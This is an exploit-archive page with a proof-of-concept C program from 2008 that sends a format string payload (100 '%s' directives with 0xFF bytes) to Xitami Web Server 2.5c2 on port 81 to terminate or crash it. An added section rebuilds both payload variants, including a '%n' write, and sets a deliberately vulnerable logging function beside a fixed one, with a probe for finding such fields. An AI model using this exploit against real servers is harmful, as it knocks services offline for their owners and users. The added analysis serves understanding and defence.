Xitami Web Server v2.5c2 LRWP Processing Format String PoC
Source: http://www.bratax.be/  Author: bratax  Published: 2008-04-07
/**
*
* PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
* Advisory is available at: http://www.bratax.be/advisories/b013.html
* (multiple vulnerabilities! check it out!)
*
* @author: bratax
* @url: http://www.bratax.be/
* @email: bratax@gmail.com
*
* Thanks to BuzzDee for teaching me how to use reverse code engineering to
* find bugs & thanks to DiabloHorn as well ;-)
* Greetz to NR!
*
**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

int main(int argc, char *argv[]){

  int sockfd;
  struct hostent *he;
  struct sockaddr_in their_addr;
  WSADATA wsaData;
  char formatstring[250];

  if (argc != 2){
    printf("\nXitami Web Server 2.5c2\n" );
    printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
    printf("[+] tested on WinXP Pro SP2 & Vista\n");
    printf("[+] usage: %s <hostname>\n\n", argv[0]);
    return -1;
  }

  if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.\n");
    return -1;
  }

  if ((he = gethostbyname(argv[1])) == NULL){  // resolve the target host
    // Winsock does not set errno, so report the WSA error code instead of perror()
    fprintf(stderr, "[-] gethostbyname failed (WSA error %d)\n", WSAGetLastError());
    WSACleanup();
    return -1;
  }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    return -1;
  }

  their_addr.sin_family = AF_INET;  // host byte order
  their_addr.sin_port = htons(PORT);  // short, network byte order
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

  if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
    printf("[-] Connect failed.\n");
    closesocket(sockfd);
    return -1;
  }

  printf("[+] Server is listening...\n");

  Sleep(1000);

  /*
    Build the format string request (250 bytes, 'A' filler):
              "%s" x 100 + \xFF + filler + \xFF     (program termination)
    or:
              "%n" + \xFF + filler + \xFF           (program crash)
  */

  memset(formatstring,'\x41', sizeof(formatstring));
  for (int i = 0; i<200; i+=2){
    memcpy(formatstring+i, "%s", 2);
  }
  memcpy(formatstring+200, "\xFF", 1);
  memcpy(formatstring+249, "\xFF", 1);

  printf("[+] Sending format string request...");
  Sleep(2000);

  if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {
    Sleep(2000);
    printf("failed! Exiting...\n");
    closesocket(sockfd);
    WSACleanup();
    return -1;
  }

  Sleep(2000);
  closesocket(sockfd);
  WSACleanup();
  printf("done.\n");

  return 0;
}
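The PoC's comment gives the layout of the two request variants but the code only builds the "%s" one. The following is an added example, not bratax's code and not Xitami's: it builds both variants exactly as the comment lays them out, counts the conversion directives an input carries, and shows the bug class the PoC triggers (client text passed as the format argument) next to the fixed form. The helper names (build_lrwp_payload, count_directives, format_into, render_unsafe, render_safe) are hypothetical, the "50%% off" input is a constructed sample, and the role of the 0xFF bytes is an assumption; the PoC only states where they go.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Layout of the two request variants the PoC's comment describes:
 *   variant 0:  "%s" x 100 + 0xFF + filler + 0xFF
 *   variant 1:  "%n"       + 0xFF + filler + 0xFF
 * Both are 250 bytes, filled with 'A' like the PoC. The meaning of the
 * 0xFF bytes is an assumption (the PoC gives only their position);
 * they are treated here as opaque delimiters. */
#define PAYLOAD_LEN 250

/* Build one variant into out. Returns bytes written, 0 if out is too small. */
size_t build_lrwp_payload(unsigned char *out, size_t outlen, int use_percent_n)
{
    size_t pos;
    if (outlen < PAYLOAD_LEN)
        return 0;
    memset(out, 'A', PAYLOAD_LEN);
    if (use_percent_n) {
        memcpy(out, "%n", 2);                /* one write directive */
        pos = 2;
    } else {
        for (pos = 0; pos < 200; pos += 2)   /* 100 read directives */
            memcpy(out + pos, "%s", 2);
    }
    out[pos] = 0xFF;                         /* delimiter after the directives */
    out[PAYLOAD_LEN - 1] = 0xFF;             /* trailing delimiter */
    return PAYLOAD_LEN;
}

/* Same, into a static buffer, for quick inspection. */
const unsigned char *poc_payload(int use_percent_n)
{
    static unsigned char buf[PAYLOAD_LEN];
    build_lrwp_payload(buf, sizeof buf, use_percent_n);
    return buf;
}

/* Count conversion directives: every '%' not escaped as "%%". A field that
 * should carry only text and still contains any is exactly what a format
 * string sink must never see. */
size_t count_directives(const unsigned char *buf, size_t len)
{
    size_t i, n = 0;
    for (i = 0; i < len; i++) {
        if (buf[i] != '%')
            continue;
        if (i + 1 < len && buf[i + 1] == '%') {
            i++;                             /* "%%" is a literal percent */
            continue;
        }
        n++;
    }
    return n;
}

/* A logging helper of the kind servers wrap around vsnprintf
 * (hypothetical; not Xitami's code). */
static int format_into(char *dst, size_t dstlen, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(dst, dstlen, fmt, ap);
    va_end(ap);
    return n;
}

/* The bug class: client text is used as the format itself. With the PoC's
 * payload the "%s" directives would read pointers off the stack and "%n"
 * would write through one, so only harmless input is fed to it below. */
const char *render_unsafe(const char *client_text)
{
    static char out[64];
    format_into(out, sizeof out, client_text);   /* format string bug */
    return out;
}

/* The fix: a constant format; the client text is only ever data. */
const char *render_safe(const char *client_text)
{
    static char out[64];
    format_into(out, sizeof out, "%s", client_text);
    return out;
}

int main(void)
{
    const unsigned char *p = poc_payload(0);
    size_t i;
    printf("%%s variant: %zu directives, first bytes:",
           count_directives(p, PAYLOAD_LEN));
    for (i = 0; i < 8; i++)
        printf(" %02x", p[i]);
    printf(" ... [200]=%02x [249]=%02x\n", p[200], p[249]);
    printf("%%n variant: %zu directive(s)\n",
           count_directives(poc_payload(1), PAYLOAD_LEN));
    /* constructed sample: the unsafe sink collapses the escaped percent,
     * proving the text was parsed as a format rather than copied */
    printf("unsafe: \"%s\"  safe: \"%s\"\n",
           render_unsafe("50%% off"), render_safe("50%% off"));
    return 0;
}
```

The "50%% off" sample is deliberately the mildest possible probe: it has no directive that consumes an argument, so the only observable effect is that "%%" collapses to "%" in the unsafe path. That same difference is the check to run against any server field that ends up in a logger: if an escaped percent comes back unescaped, the field is being used as a format, and the PoC's "%s" run or a single "%n" is enough to terminate or crash the process.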